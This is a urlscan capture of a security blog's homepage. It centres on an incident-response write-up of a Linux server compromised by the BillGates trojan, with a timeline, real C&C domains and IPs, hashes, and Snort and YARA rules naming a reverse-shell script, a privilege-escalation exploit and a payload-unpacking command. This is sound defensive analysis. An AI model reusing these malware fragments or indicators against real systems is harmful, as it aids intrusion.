urlscan.io logo urlscan.io
SecurityTrails logo

www.tekdefense.com Open in urlscan Pro
142.202.17.177  Public Scan

Back to summary
Submitted URL: http://tekdefense.com/
Effective URL: http://www.tekdefense.com/
Submission: On October 10 via manual from US — Scanned from US

Form analysis 2 forms found in the DOM

POST https://www.paypal.com/cgi-bin/webscr

<form action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_top">
  <input type="hidden" name="cmd" value="_s-xclick">
  <input type="hidden" name="hosted_button_id" value="NDNPXGT2GJGYG">
  <input type="image" src="https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
  <img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" height="1">
</form>

GET /display/Search

<form method="get" action="/display/Search">
  <input type="hidden" name="moduleId" value="18374698">
  <table class="search-form-pt-wrapper search-form-table" border="0" cellpadding="0" cellspacing="0">
    <tbody>
      <tr class="search-form-pt search-form-row">
        <td class="queryFieldCell search-form-cell">
          <span class="queryFieldWrapper">
            <input type="text" class="text queryField" name="searchQuery" value="">
          </span>
        </td>
        <td class="queryButtonCell search-form-cell">
          <span class="queryButtonWrapper">
            <input type="submit" class="button queryButton" value="→">
          </span>
        </td>
      </tr>
    </tbody>
  </table>
</form>

Text Content

 * News
 * Contact Us
 * Downloads
 * Automater
 * tekCollect
 * hashMonitor



TEKDEFENSE

 * News
 * Contact Us
 * Downloads
 * Automater
 * tekCollect
 * hashMonitor


Top
 * News
 * Contact Us
 * Downloads
 * Automater
 * tekCollect
 * hashMonitor

Sponsor



Search


LINKS

TekDefense Youtube

TekDefense Twitter

TekDefense Securitytube

TekDefense Github

Securabit

TheNewTech

Bruteforce Labs

Pentest Labs

Room362

Incoherent Ramblings

Nova InfoSec

InfoSecAlways

Recent Articles

 * Network Challenge - 001 - Solution
 * Network Challenge - 001 - Linux
 * Automater Update .21
 * BSidesNola 2015 Presentation on Honeypots
 * Over a year with Kippo
 * Automater version 2.1 released - Proxy capabilities and a little user-agent
   modification
 * Memory Forensics presentation from BSidesNola
 * Categorizing Maltrieve Output
 * Analyzing DarkComet in Memory
 * Automater Output Format and Modifications

 * October 2016 (1)
 * September 2016 (1)
 * November 2015 (1)
 * June 2015 (1)
 * July 2014 (1)
 * June 2014 (1)
 * May 2014 (1)
 * January 2014 (1)
 * December 2013 (5)
 * May 2013 (3)
 * April 2013 (3)
 * March 2013 (8)
 * February 2013 (7)
 * January 2013 (4)
 * December 2012 (5)
 * November 2012 (4)
 * October 2012 (3)
 * September 2012 (4)
 * August 2012 (5)
 * July 2012 (5)
 * June 2012 (1)

 * News RSS

Security Videos
 
OWASP MobiSec

In this video kevin talk about Mobisec and this full video is all about OWASP
Mobisec. The MobiSec Live Environment Mobile Testing Framework project is a live
environment for testing mobile environments, including devices, applications,
and supporting infrastructure. The purpose is to provide attackers and defenders
the ability to test their mobile environments to identify design weaknesses and
vulnerabilities. The MobiSec Live Environment provides a single environment for
testers to leverage the best of all available open source mobile testing tools,
as well as the ability to install additional tools and platforms, that will aid
the penetration tester through the testing process as the environment is
structured and organized based on an industry­‐proven testing framework. Using a
live environment provides penetration testers the ability to boot the MobiSec
Live Environment on any Intel-­based system from a DVD or USB flash drive, or
run the test environment within a virtual machine.
https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_MobiSec
Read More →
Securing Android Applications with GoatDroid

In this video you will learn how to secure Android Application using GoatDroid
Using This tool we will also look at on Memory Analysis, Intercepting Layer 7
Traffic, Reverse Engineering Android Application and SQlite Database Analysis
etc .. About GoatDroid :
https://www.owasp.org/index.php/OWASP_Mobile_Security_Project
Read More →
Finding the Rogue DHCP server With Wireshark

In this video you will learn how to detect a Rogue DHCP Server using Wireshark
server. Rogue DHCP server are becoming more common these days and DHCP Rogue is
easy to create and compromise a network.
Read More →
nullcon Delhi 2012: How secure is internet banking in India - By Ajit Hatti

This Research covers 7 Major areas to evaluate the security of internet banking
provided by banks in India 1. Access Control 2. Security of Data in Motion 3.
System Design 4. Security on Hostile Platform 5. Enforcement of best practices
6. Handling Hostility or DDOS attacks 7. Security as a Responsibility
Read More →
Upload Shell via SQLi Injection

This video is all about Web Application hacking and you will learn how to upload
a shell using SQL Injection.
Read More →
python tektip Automater Malware analysis Kippo Malware analysis honeypot
1aN0rmus backtrack OSINT password ssh tekdefense Honeydrive Threat Down DFIR
hash URL Github IP ipvoid MASTIFF Memory Network Network Security News Pipal
regex Static 1aNormus Bruteforce lab crack Dionaea dns dump hashCollect
information gathering Maltrieve network analsyis Notepad++ passive Ppcap
Programming Scripting SET Snort Tekdefese Volatility Adobe android APT basic
blacklist brute force

Monday
Oct032016


NETWORK CHALLENGE - 001 - SOLUTION

Monday, October 3, 2016 at 8:09AM

I Wanted to send a big thanks out to everyone who sent solutions in for the
Network challenge. While there were many responses, two (2) stood out amongst
the rest. I don't plan on doing prizes for all of these contests, but I was so
impressed by these responses, that I wanted to do something special on this
ocassion. The winners of this first challenge are:

 * First Place: @dfir_it ($150 amazon Gift Card) Solution is below
 * Second Place: @CYINT_DUDE ($50 Amazon Gift Card) Solution

The first place solution is so well written, that I figured it was worth posting
in it's entirety here (with permission from the author of course). See below for
the solution, and keep any eye on dfir.it where the author intends to post more
details on how he arrived at the answers you see below.


@DFIR_IT WINNING CONTEST SUBMISSION:

The below report attempts to provide answers to the objectives set in the
"NETWORK CHALLENGE - 001 - LINUX":

 1. Determine what likely occurred based on the evidence from the PCAP.
 2. Identify any network and/or host artifacts that could be used to scope this
    incident further.
 3. If applicable, write detection signatures (snort/suricata/yara) to increase
    coverage for this type of activity.

The report comprises of multiple sections:

 * Findings - Describes main findings and provides an overview of malicious
   activity.
 * Analysis - Provides technical analysis of captured traffic and extracted
   artifacts.
 * Timeline - Provides chronologically ordered list of events.
 * Indicators - Provides a list of network and host indicators related with
   observed malicious activity.
 * References - Contains a list of external publications, indicators and
   resources used during analysis.


FINDINGS

 * The Linux system behind the IP address 104.236.210.97 was compromised at
   approximately 2016-09-07T22:14:48Z when attacker successfully connected and
   authenticated to the system using SSH protocol.
 * At 2016-09-07T22:16:16Z attacker downloaded an instance of the BillGates
   trojan (java.log) from the remote IP address 120.210.129.29 running HFS
   server on TCP port 5198.
 * At 2016-09-07T22:19:03Z the compromised system sent first DNS Type A query
   for the domain top.t7ux.com. This event designates approximate time when
   attacker executed malicious file java.log. At the same time first "Hello"
   packet was sent by compromised system to the C&C domain top.t7ux.com.
 * At approximately 2016-09-07T23:43:06Z attacker likely initiated installation
   of the Apache httpd server by executing the following command: apt-get
   install apache2.
 * Between 2016-09-07T23:47:06Z and 2016-09-07T23:50:42Z attacker downloaded
   additional malware and tools from the remote IP address 120.210.129.29. The
   files comprised of multiple versions of BillGates trojan, reverse shell
   scrip, Netcat utility and backdoored version of OpenSSH.
 * Between 2016-09-07T23:52:18Z and 2016-09-07T23:53:05Z remote IP address
   104.236.59.209 connected to the compromised system over TCP port 80 and
   downloaded two files: nc.exe and back.pl. Observed connections likely
   indicate that attacker successfully installed and ran Apache httpd server.
 * At 2016-09-08T01:22:06Z the attacker terminated SSH session from the remote
   IP address 46.101.128.129.
 * Packet capture contained additional SSH packets from the remote IP address
   71.171.119.98 between 2016-09-08T01:22:09Z and 2016-09-08T01:22:25Z. Based on
   the time of event the connection was likely also initiated by the attacker.
 * At 2016-09-08T10:18:13Z the compromised host attempted to connect to the IP
   address 222.174.168.234 - resolution of C&C domain top.t7ux.com at that time.
 * At 2016-09-08T10:54:44Z last packet to the C&C IP address 118.192.137.245 was
   captured.
 * At 2016-09-09T13:46:05Z the compromised host sent 32038 UDP Flood packets to
   the IP address 23.83.106.115 over port 80.
 * At 2016-09-09T13:46:21Z last packet to the C&C IP address 222.174.168.234 was
   captured.


ANALYSIS

Analysis of the captured network traffic around the time (2016-09-07T22:16:16Z)
when first alert for the "HFS [File Download]" Snort signature occurred revealed
download of suspicious files java.log from the remote IP address 120.210.129.29
by the host 104.236.210.97. Initial analysis showed that the file was an
instance of the BillGates trojan compiled for x86 Linux system and set with two
C&C servers: top.t7ux.com and www.vnc8.com.

Review of network connections to the system behind the IP address 104.236.210.97
around the time when malicious file was downloaded showed only one active SSH
connection from the IP address 46.101.128.129. Based on this evidence and lack
of other connections it was determined that attacker managed to successfully
authenticate himself and establish interactive SSH connection to the system.
System was likely initially compromised at approximately 2016-09-07T22:14:48Z.
The SSH session was active for 3 hours and approximately one megabyte of data
was exchanged between endpoint during that time.

At 2016-09-07T22:19:03Z the compromised system issued first observed DNS Type A
query for the domain top.t7ux.com. At the same time system established
connection with the IP address 118.192.137.245 (resolution of top.t7ux.com at
that time) over TCP port 16081 and sent data which has been identified as
"Hello" packet generated by the BillGates trojan. The "Hello" packet contained
kernel version of the compromised Linux system (Linux 4.4.0.0-36-generic) and
version of the malware (G2.40).

Between 2016-09-07T23:43:06Z and 2016-09-07T23:43:07 the compromised system
established multiple HTTP connections to two legitimate domains
mirrors.digitalocean.com and nyc2.mirrors.digitalocean.com and downloaded
multiple .deb files. The files were determined to be legitimate software
packages of Apache httpd server and its dependencies. In the absence of
additional interactive connections to the compromised system it's likely that it
was attacker who initiated installation of the Apache httpd server by executing
the following command apt-get install apache2.

Between 2016-09-07T23:47:06Z and 2016-09-07T23:50:42Z the attacker downloaded
additional malware and tools from the remote IP address 120.210.129.29. The
below table summarizes files downloaded by the attacker:

Filename Md5 Type Architecture VT Detection C&C Description java.log
f4b3ec28a7b92de2821c221ef0faed5b ELF x86 Linux/BillGates top.t7ux.com,
www.vnc8.com BillGates trojan Linux binary 16081
c3a59d53af7571b0689e5c059311dbbe ELF x86 Linux/BillGates top.t7ux.com,
www.vnc8.com BillGates trojan Linux binary 2.6.32
ff1e9d1fc459dd83333fd94dbe36229a ELF x64 CVE-2013-2094 - CVE-2013-2094 privilege
escalation exploit (Source code) back.pl fbaeef2b329b8c0427064eb883e3b999 Perl -
- - Reverse shell script written in Perl nc.exe 1c207af4a791c5e87dcd209f2dc62bb8
PE x86 Tool.Netcat - Windows Netcat tool (UPX packed) or.bin
09b62916547477cc44121e39e1d6cc26 Bash - - - Bash script. Contained compressed
and DES-encrypted backdoored version of OpenSSH (openssh-5.9p1.tgz) SYN/Trustr
cd291abe2f5f9bc9bc63a189a68cac82 ELF x86 Linux/BillGates top.t7ux.com,
www.vnc8.com BillGates trojan Linux binary SYN_1902
3e9a55d507d6707ab32bc1e0ba37a01a ELF x86 Linux/BillGates liv.t7ux.com,
www.vnc8.com BillGates trojan Linux binary winappes.exe/Windows_1902
a91261551c31a5d9eec87a8435d5d337 PE x86 BackDoor.Gates.8 liv.t7ux.com BillGates
trojan Windows binary xmapp c5593d522903e15a7ef02323543db14c ELF x86 -
liv.t7ux.com, www.t7ux.com BillGates trojan Linux binary

Provided packet capture did not contain traces of traffic to C&C domains
identified during initial analysis of the extracted files and this likely
indicates that attacker did not execute additional instances of the BillGates
trojan. One of the extracted files or.bin contained installation script that
extracted, decrypted and installed likely backdoored version of OpenSSH daemon
(openssh-5.9p1.tgz). Analysis of SSH server versions sent by the compromised
host during negotiation of subsequent SSH connections did not reveal presence of
OpenSSH-5.9p1 string.

Between 2016-09-07T23:52:18Z and 2016-09-07T23:53:05Z the remote IP address
104.236.59.209 connected to the compromised system over TCP port 80 and
downloaded two files: nc.exe and back.pl. The HTTP server on the compromised
system identified itself as Apache/2.4.18 (Ubuntu) which suggests that the
attacker successfully managed to install and ran Apache httpd server. The system
behind the IP address 104.236.59.209 may indicate another host compromised by
the same attacker.

At 2016-09-08T01:22:06Z the attacker terminated SSH session from the remote IP
address 46.101.128.129. Analysis of the traffic showed additional SSH session to
be active around the same time and initiated from the IP address 71.171.119.98.
The packet capture contained only small fragment of data exchanged between
2016-09-08T01:22:09Z and 2016-09-08T01:22:25Z.

At approximately 2016-09-08T10:18:13Z the C&C domain top.t7ux.com started
resolving to the new IP address 222.174.168.234. At the same time the
compromised host attempted to connect to the new C&C IP address over TCP port
16081. At 2016-09-08T12:08:12Z the compromised host managed to successfully
connect to the C&C address and sent "Hello" packet.

At 2016-09-09T13:46:05Z the compromised host sent 32038 UDP Flood packets to the
IP address 23.83.106.115 over port 80. Analysis of provided PCAP did not reveal
any packets sent by the C&C server instructing BillGates trojan running on the
compromised host to initiate Denial of Service attack against IP address
23.83.106.115. Between 2016-09-09T13:46:05Z and 2016-09-09T13:46:21Z the
compromised host sent multiple packets containing string "23.83.106.115" to the
C&C server, likely as a confirmation of performed UDP Flood attack.

Last packet to the C&C server was captured at 2016-09-09T13:46:21Z.


TIMELINE

Timestamp Source IP Address Destination IP Address Protocol/Destination Port
Event Description 2016-09-07T22:14:48Z 46.101.128.129 104.236.210.97 TCP/22
Initial SSH connection from the remote IP address 46.101.128.129. Duration:
approximately 1m. 2016-09-07T22:16:07Z 46.101.128.129 104.236.210.97 TCP/22
Second SSH connection from the remote IP address 46.101.128.129. Duration:
approximately 3h. 2016-09-07T22:16:16Z 104.236.210.97 120.210.129.29 TCP/5198
Download of the BillGates trojan ELF binary java.log to the compromised host.
2016-09-07T22:16:16Z 120.210.129.29 104.236.210.97 TCP/47520 Initial alert on
the HFS [File Download] Snort signature. 2016-09-07T22:19:03Z 104.236.210.97
8.8.8.8 UDP/53 First observed DNS Type A query for the domain top.t7ux.com.
Resolution: 118.192.137.245. 2016-09-07T22:19:03Z 104.236.210.97 118.192.137.245
TCP/16081 First observed Hello beacon to the C&C IP address 118.192.137.245
2016-09-07T23:43:06Z 104.236.210.97 198.199.99.226 TCP/80 Initiated transfer of
multiple legitimate Ubuntu packages from the remote host
mirrors.digitalocean.com. 2016-09-07T23:43:06Z 104.236.210.97 192.241.164.26
TCP/80 Initiated transfer of multiple legitimate Ubuntu packages from the remote
host nyc2.mirrors.digitalocean.com. 2016-09-07T23:47:06Z 104.236.210.97
120.210.129.29 TCP/5198 Download of the BillGates trojan ELF binary 16081 to the
compromised host. 2016-09-07T23:47:24Z 104.236.210.97 120.210.129.29 TCP/5198
Download of the CVE-2013-2094 exploit file 2.6.32 to the compromised host.
2016-09-07T23:47:32Z 104.236.210.97 120.210.129.29 TCP/5198 Download of the
reverse shell script back.pl to the compromised host. 2016-09-07T23:47:41Z
104.236.210.97 120.210.129.29 TCP/5198 Download of the Netcat PE binary nc.exe
to the compromised host. 2016-09-07T23:47:50Z 104.236.210.97 120.210.129.29
TCP/5198 Download of the Bash script or.bin to the compromised host.
2016-09-07T23:49:07Z 104.236.210.97 120.210.129.29 TCP/5198 Download of the
BillGates trojan ELF binary SYN to the compromised host. 2016-09-07T23:49:18Z
104.236.210.97 120.210.129.29 TCP/5198 Download of the BillGates trojan ELF
binary SYN_1902 to the compromised host. 2016-09-07T23:49:40Z 104.236.210.97
120.210.129.29 TCP/5198 Download of the BillGates trojan ELF binary Trustr to
the compromised host. 2016-09-07T23:50:06Z 104.236.210.97 120.210.129.29
TCP/5198 Download of the BillGates trojan PE binary winappes.exe to the
compromised host. 2016-09-07T23:50:24Z 104.236.210.97 120.210.129.29 TCP/5198
Download of the BillGates trojan PE binary Windows_1902 to the compromised host.
2016-09-07T23:50:42Z 104.236.210.97 120.210.129.29 TCP/5198 Download of the
BillGates trojan ELF binary xmapp to the compromised host. 2016-09-07T23:52:18Z
104.236.59.209 104.236.210.97 TCP/80 Download of the Netcat PE binary nc.exe
from the compromised host. 2016-09-07T23:53:05Z 104.236.59.209 104.236.210.97
TCP/80 Download of the reverse shell script back.pl from the compromised host.
2016-09-08T01:22:06Z 46.101.128.129 104.236.210.97 TCP/22 End of the second SSH
connection from the remote IP address 46.101.128.129. 2016-09-08T01:22:09Z
71.171.119.98 104.236.210.97 TCP/22 First captured packet of SSH connection to
the compromised host from the IP address 71.171.119.98. 2016-09-08T01:22:25Z
71.171.119.98 104.236.210.97 TCP/22 Last captured packet of SSH connection to
the compromised host from the IP address 71.171.119.98. 2016-09-08T10:18:13Z
8.8.8.8 104.236.210.97 UDP/55022 First observed DNS response pointing
top.t7ux.com domain to the new IP address 222.174.168.234. 2016-09-08T10:18:13Z
104.236.210.97 222.174.168.234 TCP/16081 First observed attempted connection to
to the C&C IP address 222.174.168.234. 2016-09-08T10:54:44Z 104.236.210.97
118.192.137.245 TCP/16081 Last observed TCP packet sent to the C&C IP address
118.192.137.245. 2016-09-09T13:46:05Z 104.236.210.97 23.83.106.115 UDP/80 32038
UDP Flood packets sent to the remote IP address 23.83.106.115.
2016-09-09T13:46:21Z 104.236.210.97 222.174.168.234 TCP/16081 Last observed TCP
packet sent to the C&C IP address 222.174.168.234.


INDICATORS

IP ADDRESSES AND DOMAINS

The below list of network indicators is based solely on network traffic observed
in the provided PCAP and analysis of extracted artifacts:

IP Address/Domain Description 46.101.128.129 Source of suspicious SSH connection
to the compromised host. 71.171.119.98 Source of suspicious SSH connection to
the compromised host. 120.210.129.29 HFS server hosting attacker's malware and
tools. 118.192.137.245 Resolution of top.t7ux.com. BillGates Trojan C&C.
222.174.168.234 Resolution of top.t7ux.com. BillGates Trojan C&C. 104.236.59.209
Downloaded nc.exe and back.pl from the compromised host. top.t7ux.com C&C of
BillGates Trojan www.vnc8.com C&C of BillGates Trojan liv.t7ux.com C&C of
BillGates Trojan www.t7ux.com C&C of BillGates Trojan

SNORT SIGNATURES

 * BillGates Trojan - "Hello" packet

alert tcp any any -> any any (msg:"BillGates Trojan [Hello]"; content:"|01 00 00 00|"; content:"|00 00 00 00 f4 01 00 00 32 00 00 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00|"; offset:5; pcre:"/(Linux|Windows)/"; byte_test:1,>,96,4; byte_test:1,<,160,4; dsize:<160; threshold:type limit, track by_src, count 1, seconds 3600; sid:999998; rev:1;)


 * BillGates Trojan - Transfer of Linux binary

alert tcp any any -> any any (msg:"BillGates Trojan [Linux - Transfer]"; content:"GatesType"; content:"AttackBase"; distance:5; within:20; content:"ThreadShell"; distance:10; within:20; threshold:type limit, track by_src, count 1, seconds 60; sid:999997; rev:1;)


 * BillGates Trojan - Transfer of Windows binary

alert tcp any any -> any any (msg:"BillGates Trojan [Windows - Transfer]"; content:"FakeDetectPayload"; content:"FakeDetectInfo"; distance:15 ;within:20 ; content:"ShellCmd"; distance:15; within:20;  track by_src, count 1, seconds 60; sid:999996; rev:1;)


 * back.pl - Successfull reverse shell connection

alert tcp any any -> any any (msg:"Reverse Shell [back.pl]"; flow: from_client, established; content:"Enjoy the shell.|0a|"; depth:17; dsize:<256; sid:999995; rev:1;)


 * 2.6.32 CVE-2013-2094 exploit - Transfer of the binary

alert tcp any any -> any any (msg:"Exploit [CVE-2013-2094 - Transfer]"; content:"!close(fd)|00|map[i+1]|00|i<0x010000000/4"; sid:999994; rev:1;)


 * BillGates Trojan - UDP Flood packet

alert udp any any -> any any (msg:"BillGates Trojan [UDP Flood]"; content:"|00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00|"; depth:16; pcre:"/\x00{900}/"; dsize:>900; threshold:type limit, track by_src, count 1, seconds 3600; sid:999993; rev:1;)


YARA RULES

 * BillGates Trojan (Windows and Linux binaries)

rule BillGates
{
	strings:
		$elf = "\x7fELF"
		$mz = "MZ"
		$b1 = "ThreadShell"
		$b2 = "CheckGatesType"
		$b3 = "AttackBase"
		$b4 = "PacketAttack"
		$b5 = "agony.pdb"
		$b6 = "Gates.pdb"
		$b7 = "Beikong"
	condition:
		($elf at 0 or $mz at 0) and 2 of ($b*)
}


 * Reverse shell script back.pl

rule Back
{
	strings:
		$s1 = "Remote_IP Remote_Port \\n\";"
		$s2 = "\"Enjoy the shell.\\n\";"
	condition:
		2 of ($s*)
}


 * UPX-packed Netcat tool nc.exe

import "pe"

rule Netcat_UPX
{
        condition:
                pe.characteristics and pe.sections[0].name == "UPX0" and pe.sections[1].name == "UPX1" and pe.sections[2].name == "UPX2" and pe.imports("WSOCK32.dll") and filesize == 28160
}


 * Bash script or.bin

rule or_bin
{
	strings:
		$o1 = "mkdir /tmp/.tmp123 -p && tail -n $line $0 |tar zx -C /tmp/.tmp123"
		$o2 = { 0a 1f 8b 08 00}
	condition:
		2 of ($o*)
}


 * CVE-2013-2094 exploit ELF binary 2.6.32

rule CVE_2013_2094_Exploit
{
	strings:
		$elf = "\x7fELF"
		$s1 = "semtex.c"
		$s2 = "!close(fd)"
		$s3 = "map[i+1]"
		$s4 = "i<0x010000000/4"
		$s5 = "!setuid(0)"
		$s6 = "/bin/bash"
		$s7 = "2.6.37-3.x x86_64"
		$s8 = "sd@fucksheep.org 2010"
	condition:
		$elf at 0 and 3 of ($s*)
}


HOST INDICATORS

Existence of the following files on a filesystem can indicate that BillGates
Trojan was executed on a host. The list is based on execution of java.log file
on a sandbox system:

/tmp/gates.lod
/tmp/moni.lod
/usr/bin/.sshd
/usr/bin/dpkgd/lsof
/usr/bin/dpkgd/netstat
/usr/bin/dpkgd/ps
/usr/bin/dpkgd/ss
/usr/bin/bsd-port/getty
/usr/bin/bsd-port/getty.lock
/etc/rc2.d/S97DbSecuritySpt
/etc/rc3.d/S97DbSecuritySpt
/etc/rc5.d/S97DbSecuritySpt
/etc/rc4.d/S97DbSecuritySpt
/etc/rc1.d/S97DbSecuritySpt
/etc/rc2.d/S99selinux
/etc/rc3.d/S99selinux
/etc/rc5.d/S99selinux
/etc/rc4.d/S99selinux
/etc/rc1.d/S99selinux
/etc/init.d/selinux



REFERENCES

 * Malware Must Die: MMD-0039-2015: ChinaZ made new malware: ELF
   Linux/BillGates.Lite
 * Malware Must Die: China ELF botnet malware infection & distribution scheme
   unleashed
 * Malware Must Die: China ELF botnet malware infection scheme unleashed (video)
 * Akamai: BillGates Botnet Malware Used in Large DDoS Attacks
 * Novetta: The Elastic Botnet Report
 * Securelist: Versatile DDoS Trojan for Linux
 * Thisissecurity: When ELF.BillGates met Windows
 * Botconf: Chinese Chicken - Multiplatform DDoS botnets

view raw DFIR_IT_Contest_Submission.md hosted with ❤ by GitHub
Admin | Post a Comment | Share Article
tagged Network, Network Security, Ppcap, ccontest, network analsyis in News


Friday
Sep162016


NETWORK CHALLENGE - 001 - LINUX

Friday, September 16, 2016 at 9:04AM

One of my favorite sites is "Malware Traffic Analysis" where the author
routinely posts network challenges. In the spirit of contributing to this effort
of providing material for analysts to sharpen their skills, I developed a
challenge focused around a popular scenario I often come across in research and
other analysis efforts. As a heads up, any malware you may come across in the
analysis of this PCAP is in fact real malware. Please take care in how you
analyze. 

When reviewing this PCAP and writing your response please keep in mind what you
would really want in an investigation. The questions I ask at the end of this
article are intentionally vague, as I didn't want to give too much away with the
questions. What I am hoping to see in responses is that the analysts are able to
adequately tell a story of what likely occurred, identify network and host
indicators that can help further scope this incident, and write detection rules
in the detection languages of their choice to find future instances of this
activity. 

PCAP DOWNLOAD

The due date for submissions is September 25, 2016. Enjoy!


SCENARIO:

Client provides a PCAP involving all traffic they have from a victim Linux
server.  A snort signature alerted for files downloaded from an HFS server. The
client does not have any other context to provide. Other than the following is
the Snort Signature that was alerted on:

> alert tcp any any -> any any (msg:"HFS [File
> Download]";flow:to_client,established; content:"HFS 2.";distance:0;
> content:"HFS_SID="; classtype:suspicious; sid:999999; rev:1;)


OBJECTIVE:

 1. Determine what likely occurred based on the evidence from the PCAP.
 2. Identify any network and/or host artifacts that could be used to scope this
    incident further.
 3. If applicable, write detection signatures (snort/suricata/yara) to increase
    coverage for this type of activity. 


SUBMISSIONS:

Feel free to submit your responses directly to NetChallenge[at]tekdefense.com or
comment on this blog post with a link to your own article with a response. I'll
review responses, and perhaps give out a few prizes to those with great
writeups.

Admin | Post a Comment | Share Article
tagged Network, Network Security, Ppcap, Snort, contest, network analsyis in
News


Friday
Nov202015


AUTOMATER UPDATE .21

Friday, November 20, 2015 at 8:30AM


KEEPING AUTOMATER UP TO DATE:

Download the latest version: https://github.com/1aN0rmus/TekDefense-Automater
One of the more outstanding modifications added to version .21 of Automater is
that users no longer need to worry about keeping on top of the GitHub site to
ensure all of the python modules are the latest version. With a small addition
of a –Vv in the command line arguments, Automater will check if the local python
modules match the modules on the TekDefense Automater GitHub site. The –V
(--vercheck) argument is actually the argument that tells Automater to check the
modules, and the small –v (--verbose) is required to make Automater report the
outcome. If the files don’t match, Automater will send a notification to stdout
to alert the user to which module has been modified, so up to date modules can
be pulled if the user wants. The –v (--verbose) option can be used to turn on or
off any information sent to stdout to either silence or allow Automater to talk
to stdout.


Arguably an even better option added is yet another “version” check of sorts.
The sites.xml file is still required locally so that Automater can get
instructions on what sites to check and what regexs to report upon. However, a
new tekdefense.xml file is also checked for and utilized if it is found locally.
The significance of this is that with a –r (--refreshxml) switch included in the
command line argument call, Automater will check the TekDefense Automater GitHub
site and pull the tekdefense.xml file for use. If the –r switch is utilized, and
the local tekdefense.xml file is found to be different on the local machine, the
modified (updated) file on GitHub will be pulled and utilized. This ensures that
you have the ability to do your own calls with the sites.xml file, while ALSO
maintaining constant calls to sites and checks utilized by the TekDefense crew.
Together this gives the Automater use the best coverage with no modifications
required or manual processes followed.




NEW REQUIREMENTS AND WHAT THEY MEAN:


The new Automater has several updates. Out of the blocks, the requests module
(version 2.7 or above) is now required to run Automater. For instructions on
getting the requests module if you don't already have view
http://docs.python-requests.org/en/latest/user/install/. This gives us better
control of returning HTML and sets us up for further upgrades in the near future
when we begin using JSON APIs and data collecting capabilities – more on this as
things progress. Using requests, the default timeout of get calls to web sites
has now been set to 5 seconds. This allows Automater to move on after 5 seconds
of waiting for a response from a web site. However, if a web site does respond
and provide some input, but the site is slow in its response time, the get
request will not timeout. This timeout is only for those sites that just don’t
respond. Further refinements on this subject will continue in future upgrades.
There are several bug fixes and other modifications and we will soon thread
Automater to provide better response times. For instance the delay feature was
fixed.

> .\Automater.py -h
> usage: Automater.py [-h] [-o OUTPUT] [-b] [-f CEF] [-w WEB] [-c CSV]
>                     [-d DELAY] [-s SOURCE] [--proxy PROXY] [-a USERAGENT] [-V]
>                     [-r] [-v]
>                     target
> 
> IP, URL, and Hash Passive Analysis tool
> 
> positional arguments:
>   target                List one IP Address (CIDR or dash notation accepted),
>                         URL or Hash to query or pass the filename of a file
>                         containing IP Address info, URL or Hash to query each
>                         separated by a newline.
> 
> optional arguments:
>   -h, --help            show this help message and exit
>   -o OUTPUT, --output OUTPUT
>                         This option will output the results to a file.
>   -b, --bot             This option will output minimized results for a bot.
>   -f CEF, --cef CEF     This option will output the results to a CEF formatted
>                         file.
>   -w WEB, --web WEB     This option will output the results to an HTML file.
>   -c CSV, --csv CSV     This option will output the results to a CSV file.
>   -d DELAY, --delay DELAY
>                         This will change the delay to the inputted seconds.
>                         Default is 2.
>   -s SOURCE, --source SOURCE
>                         This option will only run the target against a
>                         specific source engine to pull associated domains.
>                         Options are defined in the name attribute of the site
>                         element in the XML configuration file. This can be a
>                         list of names separated by a semicolon.
>   --proxy PROXY         This option will set a proxy to use (eg.
>                         proxy.example.com:8080)
>   -a USERAGENT, --useragent USERAGENT
>                         This option allows the user to set the user-agent seen
>                         by web servers being utilized. By default, the user-
>                         agent is set to Automater/version
>   -V, --vercheck        This option checks and reports versioning for
>                         Automater. Checks each python module in the Automater
>                         scope. Default, (no -V) is False
>   -r, --refreshxml      This option refreshes the tekdefense.xml file from the
>                         remote GitHub site. Default (no -r) is False.
>   -v, --verbose         This option prints messages to the screen. Default (no
>                         -v) is False.



Specific sites (already in the sites.xml or tekdefense.xml file) can be called
in case the user only wants responses from specific sites. While previous
versions of Automater allowed this function for one site using the –s (--source)
switch, the new version allows multiple sites to be utilized by separating the
required sites with a semicolon. So in the past, if the user had a sites.xml
file with the totalhash_ip entry, the user could call Automater with –s
totalhash_ip and only receive information about totalhash. However, if the user
now wants more than totalhash output, but not all information in the sites.xml
or tekdefense.xml file(s), he could enter something like Automater –s
totalhash_ip;robtex to get totalhash and robtex information. Any site within the
sites.xml or tekdefense.xml ca be joined in this way using the semicolon
separator between sites.






 

Lastly, there is now a bot output mode for those who want friendlier output for
bots. For instance here is the output using Automater with -b in a skype bot.

 



Admin | Post a Comment | Share Article
tagged Automater, python in News


Monday
Jun012015


BSIDESNOLA 2015 PRESENTATION ON HONEYPOTS

Monday, June 1, 2015 at 6:57PM

Wow, it has been a long time since I have posted. I plan to rectify my posting
frequency problems, starting now. Last weekend @p4r4n0y1ng and I (@TekDefense)
gave a presentation on Honeypots called "Catch More Honeys when you are fly" at
BSidesNola. See the slides below:



I will be publishing a more detailed article on SSHPsychos soon!

Admin | Post a Comment | Share Article
tagged Dionaea, ELK, Kippo, SSHPsychos, honeypot in News


Sunday
Jul202014


OVER A YEAR WITH KIPPO

Sunday, July 20, 2014 at 8:31PM

UPDATE: After posting @ikoniaris of Honeydrive and Bruteforce fame recommended
running these. Here are the results of kippo-stats.pl created by Tomasz Miklas
and Miguel jacq.

As many of you know from previous posts, I am a big fan of honeypots,
particularly Kippo. My main Kippo instance sitting in AWS has been online for
over a year now. Let's take a look at what we have captured and learned over
this past year. If you want to validate any of these statistics I have made the
raw logs available for download.


GENERAL STATS:

Unique values (135526 connections):

*csv with geo location



*Map Generated with JCSOCAL's GIPC

Top 11 Countries

China: 699

United States: 654

Brazil: 76

Russian Federation: 69

Germany: 65

Korea, Republic of: 57

Romania: 56

Egypt: 52

Japan: 50

India: 41

Indonesia: 41

Unique Usernames: 8600 (Username list)



 Unique Passwords: 75780 (wordlist)





Unique Sources: 1985 (list of IPs)




PASSWORDS:

One of my favorite uses of kippo data is to generate wordlists from login
attempts. I wrote a quick script to parse the kippo logs and pull out all
passwords and unique them into a wordlist. Feel free to grab. Additionally I
made the wordlists available for download.

Using Pipal I performed analysis of all the login attempts over this year:



This file contains bidirectional Unicode text that may be interpreted or
